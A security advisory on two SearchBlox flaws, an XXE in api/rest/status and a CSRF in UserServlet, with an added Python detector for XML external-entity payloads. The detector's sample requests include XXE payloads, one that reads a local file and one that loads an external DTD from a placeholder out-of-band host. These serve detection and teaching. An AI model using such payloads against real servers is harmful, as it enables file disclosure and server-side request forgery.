Multiple vulnerabilities in SearchBlox



Published: 2018-06-13
Risk: Low
Patch available: Yes
Number of vulnerabilities: 2
CVE-ID: CVE-2018-11586, CVE-2018-11538
CWE-ID: CWE-611, CWE-352
Exploitation vector: Network
Public exploit: Public exploit code for vulnerability #1 is available. Public exploit code for vulnerability #2 is available.
Vulnerable software: SearchBlox (Client/Desktop applications / Other client software)

Vendor: SearchBlox

Security Bulletin

This security bulletin contains information about 2 vulnerabilities.

1) XXE attack

EUVDB-ID: #VU13328

Risk: Low

CVSSv3.1: 6.6 [CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C]

CVE-ID: CVE-2018-11586

CWE-ID: CWE-611 - Improper Restriction of XML External Entity Reference ('XXE')

Exploit availability: Yes

Description

The vulnerability allows a remote attacker to conduct an XXE attack on the target system.

The vulnerability exists due to insecure processing of XML external entities in api/rest/status. A remote attacker can submit a specially crafted DTD in an XML request and read arbitrary files or conduct server-side request forgery (SSRF) attacks.
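
As an added illustration that is not part of this bulletin: a defender-side check that flags XML request bodies carrying the DTD constructs this weakness depends on, run over constructed sample requests to the affected path. The sample bodies, the placeholder file path and the placeholder host are invented for the example; the check is a signature match on the raw body and does not parse the XML.

```python
"""Flag XML request bodies carrying a DTD or external entity declaration (CWE-611).
A status endpoint has no reason to receive a DOCTYPE, so any DTD is suspicious and an
ENTITY declared SYSTEM or PUBLIC (file path or URL) is a clear XXE indicator."""
import re
from typing import NamedTuple

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# General (<!ENTITY x SYSTEM ...>) or parameter (<!ENTITY % x SYSTEM ...>) entity that
# references an external resource; parameter entities are the usual out-of-band vehicle.
EXTERNAL_ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<param>%\s*)?(?P<name>[^\s>]+)\s+(?P<kind>SYSTEM|PUBLIC)\b",
    re.IGNORECASE,
)

class Finding(NamedTuple):
    path: str
    verdict: str  # "external-entity", "dtd-present" or "clean"
    detail: str

def classify_xml_body(path: str, body: str) -> Finding:
    """Classify one request body; the most severe construct found decides the verdict."""
    m = EXTERNAL_ENTITY_RE.search(body)
    if m:
        flavour = "parameter" if m.group("param") else "general"
        return Finding(path, "external-entity",
                       f"{flavour} entity {m.group('name')} declared {m.group('kind').upper()}")
    if DOCTYPE_RE.search(body):
        return Finding(path, "dtd-present", "DOCTYPE present without external entity")
    return Finding(path, "clean", "")

def scan(requests):
    """Return a Finding for every (path, body) pair that is not clean."""
    return [f for f in (classify_xml_body(p, b) for p, b in requests) if f.verdict != "clean"]

# Constructed sample requests to the affected path; not captured traffic.
SAMPLE_REQUESTS = [
    ("/api/rest/status", "<?xml version='1.0'?><status><q>test</q></status>"),
    ("/api/rest/status", "<!DOCTYPE r [<!ENTITY xxe SYSTEM 'file:///PATH-PLACEHOLDER'>]><r>&xxe;</r>"),
    ("/api/rest/status", "<!DOCTYPE r [<!ENTITY % ext SYSTEM 'http://OOB-HOST-PLACEHOLDER/x.dtd'> %ext;]><r/>"),
    ("/api/rest/status", "<!DOCTYPE r [<!ENTITY a 'aaaa'>]><r>&a;</r>"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_REQUESTS):
        print(f"{f.verdict:16} {f.path}  {f.detail}")
```

Rejecting any body with a DOCTYPE at the edge is the safe default for this endpoint; the "dtd-present" verdict is kept separate only so that internal-only DTDs can be reviewed rather than silently dropped.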

Mitigation

Install the update from the vendor's website.

Vulnerable software versions

SearchBlox: 8.6.7

External links

http://gurelahmet.com/searchblox-8-6-7-out-of-band-xml-external-entity-oob-xxe-cve-2018-11586/


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote non-authenticated attacker via the Internet.

Is there known malware which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability. However, a proof of concept for this vulnerability is available.

2) Cross-site request forgery

EUVDB-ID: #VU13335

Risk: Low

CVSSv3.1: 6.5 [CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N/E:P/RL:O/RC:C]

CVE-ID: CVE-2018-11538

CWE-ID: CWE-352 - Cross-Site Request Forgery (CSRF)

Exploit availability: Yes

Description

The vulnerability allows a remote attacker to perform a CSRF attack.

The weakness exists in servlet/UserServlet due to insufficient validation of user-supplied input passed via the u_name, u_passwd1, u_passwd2, role, and X-XSRF-TOKEN POST parameters. A remote attacker can create a specially crafted HTML page or URL, trick the victim into visiting it, bypass the CSRF token protection, gain access to the system and perform arbitrary actions.

Mitigation

Install the update from the vendor's website.

Vulnerable software versions

SearchBlox: 8.6.6

External links

http://gurelahmet.com/cve-2018-11538-csrf-privilege-escalation-creation-of-an-administrator-account-on-searchblox-8-6-6/


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote non-authenticated attacker via the Internet.

Is there known malware which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability. However, a proof of concept for this vulnerability is available.
